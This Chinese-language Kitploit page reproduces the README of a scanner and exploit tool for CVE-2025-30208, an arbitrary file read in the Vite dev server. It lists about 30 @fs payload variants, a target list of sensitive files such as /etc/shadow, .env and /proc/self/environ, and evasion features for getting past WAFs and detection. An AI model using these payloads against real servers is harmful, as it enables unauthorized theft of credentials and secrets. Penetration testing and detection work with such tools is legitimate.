Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 是 Vite 开发服务器(一款流行的前端构建工具)中的一个中等严重程度的任意文件读取漏洞。 | Kitploit
工具/GitHubGitHub/themehackers/cve-2025-30208
漏洞扫描器Payload生成漏洞利用信息收集Web安全渗透测试
GitHubthemehackers/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 是 Vite 开发服务器(一款流行的前端构建工具)中的一个中等严重程度的任意文件读取漏洞。

查看仓库
10121年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🔥 CVE-2025-30208 Vite 任意文件读取漏洞扫描器

Python License Security Status Modular

CVE-2025-30208 高级漏洞扫描器,具备企业级特性

用于检测 Vite 任意文件读取漏洞的专业渗透测试工具

🚀 快速开始 • 📋 功能特性 • 🔧 使用方法 • 📊 示例 • 🛡️ 安全


📖 概述

这是一个综合性漏洞扫描器,旨在检测和利用 Vite 开发服务器中的 CVE-2025-30208 漏洞。该漏洞允许攻击者通过 Vite 的文件系统端点实现任意文件读取,从而可能暴露敏感配置文件、源代码和系统信息。

🎯 此工具的功能

  • 检测 网络中存在漏洞的 Vite 实例
  • 安全地利用 任意文件读取漏洞
  • 发现 敏感文件和配置数据
  • 以多种格式 报告结果(HTML、JSON、控制台)
  • 管理 扫描会话和配置
  • 优雅地处理错误,具备自动重试机制

🏗️ 模块化架构

该工具现在采用模块化架构,以提升可维护性和可扩展性:

  • CVE-2025-30208.py - 主扫描器应用程序
  • payloads.py - 高级利用载荷(60+ 种变体)
  • sensitive_files.py - 综合性敏感文件数据库(200+ 个文件)
  • html_template.py - 增强的黑客风格 HTML 报告模板

🚀 快速开始

前提条件

pip3 install -r requirements.txt

基本使用

python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 功能特性

🔍 核心漏洞检测

  • 60+ 高级载荷: 全面的利用技术,实现最大检测率
  • 智能检测: 智能响应分析,避免误报
  • 实时验证: 持续验证目标响应
  • 全面测试: 测试所有已知的漏洞端点

🛡️ 增强的安全特性

  • 代理支持: 配置 HTTP/HTTPS 代理以实现匿名
  • 自定义请求头: 通过自定义 HTTP 请求头绕过 WAF/IPS
  • 速率限制: 可配置延迟以规避检测
  • 会话管理: 保存和恢复扫描会话
  • 输入验证: 全面的参数验证

🔧 高级功能

  • 批量扫描: 多线程扫描多个目标
  • 敏感文件发现: 自动发现 200+ 个敏感文件
  • 连通性测试: TCP/UDP/HTTP/HTTPS 协议测试
  • 错误恢复: 自动重试,采用指数退避
  • 全面日志记录: 详细日志,带时间戳

📊 报告与输出

  • 🎨 增强的 HTML 报告: 美观的黑客风格漏洞报告,包含动画效果
  • JSON 导出: 结构化数据,便于进一步分析
  • 控制台输出: 彩色编码实时反馈
  • 日志文件: 详细审计跟踪
  • 交互式 Web 界面: 内置 Web 服务器,用于查看报告

🔧 使用方法指南

1. 基本配置

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. 漏洞测试

CVE-2025-30208 > run

# 启用详细模式以获取更详细的输出
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. 批量扫描

CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[按两次回车结束]

4. 敏感文件发现

CVE-2025-30208 > scan

5. 高级配置

# 配置代理
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# 设置自定义请求头
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# 配置速率限制
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. 增强的 HTML 报告

# 生成美观的 HTML 报告
CVE-2025-30208 > pull

# 启动 Web 服务器查看报告
CVE-2025-30208 > web

# 在指定端口启动 Web 服务器
CVE-2025-30208 > web 8081

# 停止 Web 服务器
CVE-2025-30208 > web off

📊 命令参考

命令描述示例
set <option> <value>设置配置选项set RHOST 192.168.1.100
show options显示当前设置show options
edit交互式选项编辑器edit
run / exploit运行漏洞测试run
batch批量扫描多个目标batch
scan发现敏感文件scan
pull导出结果到 HTML/JSONpull
web [on|off|port]HTML 报告 Web 服务器web 8080
save保存会话配置save
load加载会话配置load
test测试与目标的连通性test
validate验证当前配置validate
verbose切换详细模式verbose
proxy配置代理设置proxy
headers设置自定义 HTTP 请求头headers
rate配置速率限制rate
log显示日志信息log
help / ?显示帮助help
exit / quit退出工具exit

⚙️ 配置选项

选项描述默认值验证规则
RHOST目标主机/IP 地址-主机名/IP 验证
RPORT目标端口号-端口范围 (1-65535)
FILEPATH要测试的文件路径etc/passwd路径验证
PROXYHTTP/HTTPS 代理 URL-URL 格式验证
VERBOSE启用详细输出false布尔值验证
RATE_LIMIT请求之间的延迟(秒)0.3数字验证
THREADS批量扫描的线程数5整数验证
TIMEOUT请求超时(秒)5整数验证
CUSTOM_HEADERS自定义 HTTP 请求头(JSON){}JSON 格式验证

🎨 增强的载荷系统

扫描器现在使用 60+ 种不同的载荷变体,组织在 payloads.py 中:

主要 @fs 载荷

/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url

扩展参数变体

/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8

Vite 特有变体

/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug

模块系统变体

/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html

替代端点

/app/{file_path}?raw??
/App/{file_path}?raw??

🔍 增强的敏感文件发现

该工具现在测试 200+ 个敏感文件,组织在 sensitive_files.py 中:

🖥️ 系统文件 (Linux/Unix)

  • /etc/passwd - 用户账户信息
  • /etc/shadow - 加密密码数据
  • /etc/services - 网络服务
  • /etc/hosts - 主机名映射
  • /etc/fstab - 文件系统表
  • /etc/ssh/sshd_config - SSH 服务器配置
  • /etc/crontab - 系统计划任务
  • /etc/sudoers - Sudo 配置

📊 进程信息

  • /proc/version - 内核版本
  • /proc/cpuinfo - CPU 信息
  • /proc/meminfo - 内存信息
  • /proc/self/environ - 进程环境变量
  • /proc/self/cmdline - 进程命令行
  • /proc/net/tcp - TCP 连接
  • /proc/net/udp - UDP 连接

⚙️ 应用程序配置

  • .env - 环境变量
  • .env.local - 本地环境
  • .env.production - 生产环境
  • config.json - 应用程序配置
  • settings.json - 应用程序设置
  • application.properties - Spring 配置
  • application.yml - YAML 配置
  • database.yml - 数据库配置
  • secrets.json - 密钥管理

📦 Node.js / JavaScript 文件

  • package.json - Node.js 依赖项
  • package-lock.json - 锁定依赖项
  • yarn.lock - Yarn 锁定文件
  • vite.config.js - Vite 配置
  • vite.config.ts - TypeScript Vite 配置
  • tsconfig.json - TypeScript 配置
  • webpack.config.js - Webpack 配置
  • next.config.js - Next.js 配置
  • nuxt.config.js - Nuxt.js 配置
  • angular.json - Angular 配置
  • vue.config.js - Vue.js 配置
  • rollup.config.js - Rollup 配置
  • eslint.config.js - ESLint 配置
  • prettier.config.js - Prettier 配置
  • jest.config.js - Jest 配置
  • babel.config.js - Babel 配置
  • tailwind.config.js - Tailwind CSS 配置

🔧 Git 文件

  • .git/config - Git 配置
  • .gitignore - Git 忽略规则
  • .gitattributes - Git 属性
  • .gitmodules - Git 子模块
  • .git/HEAD - 当前分支
  • .git/logs/HEAD - Git 日志
  • .git/refs/heads/master - master 分支
  • .git/refs/heads/main - main 分支

📚 文档文件

  • README.md - 项目文档
  • CHANGELOG.md - 变更日志
  • LICENSE - 许可证信息
  • CONTRIBUTING.md - 贡献指南
  • AUTHORS - 作者信息
  • TODO.md - 待办事项列表
  • ROADMAP.md - 开发路线图

🐳 Docker 文件

  • Dockerfile - Docker 配置
  • docker-compose.yml - Docker Compose
  • docker-compose.override.yml - 覆盖配置
  • .dockerignore - Docker 忽略规则
  • docker-compose.prod.yml - 生产配置
  • docker-compose.dev.yml - 开发配置

🌐 Web 服务器配置

  • nginx.conf - Nginx 配置
  • apache2.conf - Apache 配置
  • httpd.conf - HTTP 守护程序配置
  • .htaccess - Apache 访问控制
  • web.config - IIS 配置
  • robots.txt - 搜索引擎指令
  • sitemap.xml - 网站结构
  • manifest.json - Web 应用清单
  • sw.js - Service Worker
  • firebase.json - Firebase 配置
  • firebase.rules - Firebase 安全规则

🪟 Windows 文件

  • boot.ini - 启动配置
  • autoexec.bat - 自动执行脚本
  • system.ini - 系统配置
  • win.ini - Windows 配置
  • Users - 用户目录
  • Windows - 系统文件
  • Program Files - 应用程序目录

🍎 macOS 文件

  • System - 系统文件
  • Library - 库文件
  • Applications - 应用程序文件
  • private/etc/hosts - Hosts 文件
  • private/etc/passwd - 用户账户

🗄️ 数据库文件

  • database.db - SQLite 数据库
  • database.sqlite - SQLite 数据库
  • data.db - 数据数据库
  • dump.sql - 数据库转储
  • schema.sql - 数据库模式
  • migrations - 数据库迁移

📝 日志文件

  • logs - 日志目录
  • error.log - 错误日志
  • access.log - 访问日志
  • app.log - 应用程序日志
  • debug.log - 调试日志
  • combined.log - 合并日志
下载工具